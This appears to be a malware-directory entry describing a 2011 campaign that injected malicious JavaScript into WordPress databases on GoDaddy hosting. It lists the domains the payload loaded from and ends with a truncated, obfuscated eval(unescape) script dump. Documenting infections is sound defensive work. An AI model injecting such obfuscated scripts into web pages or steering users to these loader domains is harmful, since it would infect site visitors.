Description:
Code used to insert a malicious javascript on many WordPress sites hosted at GoDaddy. The malicious code is added to the database, infecting every post. Loads the malware from lessthenaminutehandle.com and many other domains:
http://welcometotheglobalisnet.com/js.php?kk=25
http://lessthenaminutehandle.com/js.php?kk=33
http://www3.incredible-protectionro.rr.nu
http://sweepstakesandcontestsnow.com/nl.php?nnn=1
www3.powerkbsentinel.rr.nu
www3.aboutavsoft.com
www3.first-guardul.cz.cc
www3.first-security-checker.com
www3.incredible-protectionro.rr.nu
www3.netprotectionsoftre.com
www3.save-internet-foru.com
www3.simpleclean-foru.net
www3.smart-security-holder.in
www3.smartsuite-4u.in
www3.top-network-guard.in
www3.top-scan-foru.in
www3.topsuitesentinel.rr.nu
www4.first-internetmaster.net
www4.goodghtsafe.rr.nu
www4.seeeresafe.in
www4.seefredsafe.in
www4.smartinternet-foryou.net
www4.top-only-scanner.uni.cc
Generally infecting all WordPress posts. More details here: http://blog.sucuri.net/2011/02/hilary-kneber-godaddy-and-welcometotheglobalisnet-com.html
Clean up:
Contact support@sucuri.net.
Malware dump:
<script>eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%77%72 %69%7..